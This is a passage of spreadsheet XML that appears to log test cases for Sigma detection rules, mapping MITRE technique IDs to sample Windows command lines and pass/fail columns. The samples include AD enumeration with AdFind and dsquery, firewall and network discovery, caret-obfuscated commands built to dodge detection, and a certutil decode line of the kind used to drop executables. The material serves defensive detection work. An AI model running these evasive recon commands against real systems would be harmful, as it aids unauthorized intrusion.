          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1877" s="43" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1877" s="43" t="inlineStr">
        <is>
          <t>AdFind.exe -default -s base lockout""duration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties</t>
        </is>
      </c>
      <c r="F1877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1877" s="43" t="n"/>
      <c r="J1877" s="43" t="n"/>
      <c r="K1877" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1878" ht="15.75" customHeight="1" s="42">
      <c r="A1878" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1878" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C1878" s="43" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D1878" s="43" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E1878" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "AdFind.exe -s^c exchaddresses"</t>
        </is>
      </c>
      <c r="F1878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1878" s="43" t="n"/>
      <c r="J1878" s="43" t="n"/>
      <c r="K1878" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1879" ht="15.75" customHeight="1" s="42">
      <c r="A1879" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1879" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1879" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1879" s="43" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1879" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "net.exe ti^me \localhost"</t>
        </is>
      </c>
      <c r="F1879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1879" s="43" t="n"/>
      <c r="J1879" s="43" t="n"/>
      <c r="K1879" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1880" ht="15.75" customHeight="1" s="42">
      <c r="A1880" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1880" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_time_discovery</t>
        </is>
      </c>
      <c r="C1880" s="43" t="inlineStr">
        <is>
          <t>Discovery of a System Time</t>
        </is>
      </c>
      <c r="D1880" s="43" t="inlineStr">
        <is>
          <t>b243b280-65fe-48df-ba07-6ddea7646427</t>
        </is>
      </c>
      <c r="E1880" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "w32tm /t^z"</t>
        </is>
      </c>
      <c r="F1880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1880" s="43" t="n"/>
      <c r="J1880" s="43" t="n"/>
      <c r="K1880" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1881" ht="15.75" customHeight="1" s="42">
      <c r="A1881" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1881" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_w32tm</t>
        </is>
      </c>
      <c r="C1881" s="43" t="inlineStr">
        <is>
          <t>Use of W32tm as Timer</t>
        </is>
      </c>
      <c r="D1881" s="43" t="inlineStr">
        <is>
          <t>6da2c9f5-7c53-401b-aacb-92c040ce1215</t>
        </is>
      </c>
      <c r="E1881" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "w32tm /str^ipchart /computer:localhost /per^iod:5 /data^only /sam^ples:2"</t>
        </is>
      </c>
      <c r="F1881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1881" s="43" t="n"/>
      <c r="J1881" s="43" t="n"/>
      <c r="K1881" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1882" ht="15.75" customHeight="1" s="42">
      <c r="A1882" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B1882" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C1882" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D1882" s="43" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E1882" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "for /R C:\ %i in (*) do @echo %i"</t>
        </is>
      </c>
      <c r="F1882" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1882" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1882" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1882" s="43" t="n"/>
      <c r="J1882" s="43" t="n"/>
      <c r="K1882" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1883" ht="15.75" customHeight="1" s="42">
      <c r="A1883" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B1883" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C1883" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D1883" s="43" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E1883" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set d=di &amp;&amp; set r=r &amp;&amp; call %d%%r% /s"</t>
        </is>
      </c>
      <c r="F1883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1883" s="43" t="n"/>
      <c r="J1883" s="43" t="n"/>
      <c r="K1883" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1884" ht="15.75" customHeight="1" s="42">
      <c r="A1884" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1884" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1884" s="43" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1884" s="43" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1884" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "dsquery * -filter "(objectClass=trusted^Domain)" -attr *"</t>
        </is>
      </c>
      <c r="F1884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1884" s="43" t="n"/>
      <c r="J1884" s="43" t="n"/>
      <c r="K1884" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1885" ht="15.75" customHeight="1" s="42">
      <c r="A1885" s="44" t="n"/>
      <c r="B1885" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_active_directory_module_dll_import</t>
        </is>
      </c>
      <c r="C1885" s="44" t="inlineStr">
        <is>
          <t>Potential Active Directory Enumeration Using AD Module - ProcCreation</t>
        </is>
      </c>
      <c r="D1885" s="44" t="inlineStr">
        <is>
          <t>70bc5215-526f-4477-963c-a47a5c9ebd12</t>
        </is>
      </c>
      <c r="E1885" s="44" t="n"/>
      <c r="F1885" s="44" t="n"/>
      <c r="G1885" s="44" t="n"/>
      <c r="H1885" s="44" t="n"/>
      <c r="I1885" s="44" t="n"/>
      <c r="J1885" s="44" t="n"/>
      <c r="K1885" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1886" ht="15.75" customHeight="1" s="42">
      <c r="A1886" s="44" t="n"/>
      <c r="B1886" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_obfuscated_ip_download</t>
        </is>
      </c>
      <c r="C1886" s="44" t="inlineStr">
        <is>
          <t>Obfuscated IP Download Activity</t>
        </is>
      </c>
      <c r="D1886" s="44" t="inlineStr">
        <is>
          <t>cb5a2333-56cf-4562-8fcb-22ba1bca728d</t>
        </is>
      </c>
      <c r="E1886" s="44" t="n"/>
      <c r="F1886" s="44" t="n"/>
      <c r="G1886" s="44" t="n"/>
      <c r="H1886" s="44" t="n"/>
      <c r="I1886" s="44" t="n"/>
      <c r="J1886" s="44" t="n"/>
      <c r="K1886" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1887" ht="15.75" customHeight="1" s="42">
      <c r="A1887" s="44" t="n"/>
      <c r="B1887" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_obfuscated_ip_via_cli</t>
        </is>
      </c>
      <c r="C1887" s="44" t="inlineStr">
        <is>
          <t>Obfuscated IP Via CLI</t>
        </is>
      </c>
      <c r="D1887" s="44" t="inlineStr">
        <is>
          <t>56d19cb4-6414-4769-9644-1ed35ffbb148</t>
        </is>
      </c>
      <c r="E1887" s="44" t="n"/>
      <c r="F1887" s="44" t="n"/>
      <c r="G1887" s="44" t="n"/>
      <c r="H1887" s="44" t="n"/>
      <c r="I1887" s="44" t="n"/>
      <c r="J1887" s="44" t="n"/>
      <c r="K1887" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1888" ht="15.75" customHeight="1" s="42">
      <c r="A1888" s="44" t="n"/>
      <c r="B1888" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_accesschk_check_permissions</t>
        </is>
      </c>
      <c r="C1888" s="44" t="inlineStr">
        <is>
          <t>Permission Check Via Accesschk.EXE</t>
        </is>
      </c>
      <c r="D1888" s="44" t="inlineStr">
        <is>
          <t>c625d754-6a3d-4f65-9c9a-536aea960d37</t>
        </is>
      </c>
      <c r="E1888" s="44" t="n"/>
      <c r="F1888" s="44" t="n"/>
      <c r="G1888" s="44" t="n"/>
      <c r="H1888" s="44" t="n"/>
      <c r="I1888" s="44" t="n"/>
      <c r="J1888" s="44" t="n"/>
      <c r="K1888" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1889" ht="15.75" customHeight="1" s="42">
      <c r="A1889" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1889" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1889" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1889" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1889" s="44" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1889" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1889" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1889" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1889" s="44" t="n"/>
      <c r="J1889" s="44" t="n"/>
      <c r="K1889" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1890" ht="15.75" customHeight="1" s="42">
      <c r="A1890" s="44" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1890" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1890" s="44" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1890" s="44" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1890" s="44" t="inlineStr">
        <is>
          <t>chcp.com</t>
        </is>
      </c>
      <c r="F1890" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1890" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1890" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1890" s="44" t="n"/>
      <c r="J1890" s="44" t="n"/>
      <c r="K1890" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1891" ht="15.75" customHeight="1" s="42">
      <c r="A1891" s="44" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1891" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1891" s="44" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1891" s="44" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1891" s="44" t="inlineStr">
        <is>
          <t>chcp 65001</t>
        </is>
      </c>
      <c r="F1891" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1891" s="44" t="n"/>
      <c r="J1891" s="44" t="n"/>
      <c r="K1891" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1892" ht="15.75" customHeight="1" s="42">
      <c r="A1892" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1892" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1892" s="44" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1892" s="44" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1892" s="44" t="inlineStr">
        <is>
          <t>reg query "HKLM\SOFTWARE\Microsoft\\Windows NT\\CurrentVersion" /v CurrentBuildNumber</t>
        </is>
      </c>
      <c r="F1892" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1892" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1892" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1892" s="44" t="n"/>
      <c r="J1892" s="44" t="n"/>
      <c r="K1892" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1893" ht="15.75" customHeight="1" s="42">
      <c r="A1893" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1893" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1893" s="44" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1893" s="44" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1893" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion' | Select-Object -ExpandProperty CurrentBuildNumber"</t>
        </is>
      </c>
      <c r="F1893" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1893" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1893" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1893" s="44" t="n"/>
      <c r="J1893" s="44" t="n"/>
      <c r="K1893" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1894" ht="15.75" customHeight="1" s="42">
      <c r="A1894" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1894" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1894" s="44" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1894" s="44" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1894" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "gp""v -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion' -Name CurrentBuildNumber"</t>
        </is>
      </c>
      <c r="F1894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1894" s="44" t="n"/>
      <c r="J1894" s="44" t="n"/>
      <c r="K1894" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1895" ht="15.75" customHeight="1" s="42">
      <c r="A1895" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1895" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1895" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1895" s="44" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1895" s="44" t="inlineStr">
        <is>
          <t>gpresult.exe -z</t>
        </is>
      </c>
      <c r="F1895" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1895" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1895" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1895" s="44" t="n"/>
      <c r="J1895" s="44" t="n"/>
      <c r="K1895" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1896" ht="15.75" customHeight="1" s="42">
      <c r="A1896" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1896" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1896" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1896" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1896" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle 1 C:\script.ps1</t>
        </is>
      </c>
      <c r="F1896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1896" s="44" t="n"/>
      <c r="J1896" s="44" t="n"/>
      <c r="K1896" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1897" ht="15.75" customHeight="1" s="42">
      <c r="A1897" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1897" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1897" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1897" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1897" s="44" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -f -decode="" C:\encoded.txt C:\decoded.exe</t>
        </is>
      </c>
      <c r="F1897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1897" s="44" t="n"/>
      <c r="J1897" s="44" t="n"/>
      <c r="K1897" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1898" ht="15.75" customHeight="1" s="42">
      <c r="A1898" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1898" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1898" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1898" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1898" s="44" t="inlineStr">
        <is>
          <t>ping.exe /n 4 127.0.0.1</t>
        </is>
      </c>
      <c r="F1898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1898" s="44" t="n"/>
      <c r="J1898" s="44" t="n"/>
      <c r="K1898" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1899" ht="15.75" customHeight="1" s="42">
      <c r="A1899" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1899" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1899" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1899" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1899" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d" C:\Windows</t>
        </is>
      </c>
      <c r="F1899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1899" s="44" t="n"/>
      <c r="J1899" s="44" t="n"/>
      <c r="K1899" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1900" ht="15.75" customHeight="1" s="42">
      <c r="A1900" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1900" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1900" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1900" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1900" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w 1 -c "Write-Output 'Webshell Test'"</t>
        </is>
      </c>
      <c r="F1900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1900" s="44" t="n"/>
      <c r="J1900" s="44" t="n"/>
      <c r="K1900" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1901" ht="15.75" customHeight="1" s="42">
      <c r="A1901" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1901" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C1901" s="44" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1901" s="44" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E1901" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall "firewall" "show" "rule" name=all</t>
        </is>
      </c>
      <c r="F1901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1901" s="44" t="n"/>
      <c r="J1901" s="44" t="n"/>
      <c r="K1901" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1902" ht="15.75" customHeight="1" s="42">
      <c r="A1902" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1902" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C1902" s="44" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1902" s="44" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E1902" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall	show	rule	name=all</t>
        </is>
      </c>
      <c r="F1902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1902" s="44" t="n"/>
      <c r="J1902" s="44" t="n"/>
      <c r="K1902" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1903" ht="15.75" customHeight="1" s="42">
      <c r="A1903" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1903" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C1903" s="44" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1903" s="44" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E1903" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall sh rule name=all</t>
        </is>
      </c>
      <c r="F1903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1903" s="44" t="n"/>
      <c r="J1903" s="44" t="n"/>
      <c r="K1903" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1904" ht="15.75" customHeight="1" s="42">
      <c r="A1904" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1904" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C1904" s="44" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1904" s="44" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E1904" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\netsh.exe advfirewall firewall show rule name=all</t>
        </is>
      </c>
      <c r="F1904" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1904" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1904" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1904" s="44" t="n"/>
      <c r="J1904" s="44" t="n"/>
      <c r="K1904" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1905" ht="15.75" customHeight="1" s="42">
      <c r="A1905" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1905" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1905" s="44" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1905" s="44" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1905" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "ipconfig -all"</t>
        </is>
      </c>
      <c r="F1905" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1905" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1905" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1905" s="44" t="n"/>
      <c r="J1905" s="44" t="n"/>
      <c r="K1905" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1906" ht="15.75" customHeight="1" s="42">
      <c r="A1906" s="44" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1906" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1906" s="44" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1906" s="44" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1906" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "netsh int sh int"</t>
        </is>
      </c>
      <c r="F1906" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1906" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1906" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1906" s="44" t="n"/>
      <c r="J1906" s="44" t="n"/>
      <c r="K1906" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1907" ht="15.75" customHeight="1" s="42">
